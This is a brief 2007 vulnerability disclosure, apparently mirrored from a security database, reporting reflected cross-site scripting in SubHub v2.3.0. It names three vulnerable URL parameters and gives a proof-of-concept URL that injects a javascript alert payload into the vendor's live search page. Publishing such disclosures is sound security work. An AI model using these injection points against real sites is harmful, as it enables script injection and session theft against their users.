Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16426
HistoryMar 22, 2007 - 12:00 a.m.

**SubHub v2.3.0**

2007-03-2200:00:00
vulners.com
12

SubHub v2.3.0

Site: http://www.subhub.com/
& others that use this software

Type of Expliot: XSS

Version : 2.3.0

Discover: }T{-_-}T{

Bug in : /search?searchtext=<insert xss here>
/calendar/?message=<insert xss here>
/subscribe?message=<insert xss here>


Exploit POC
http://www.subhub.com/search?searchtext= <IMG SRC=javascript:alert('XSS')>


Greetz to : -ZV-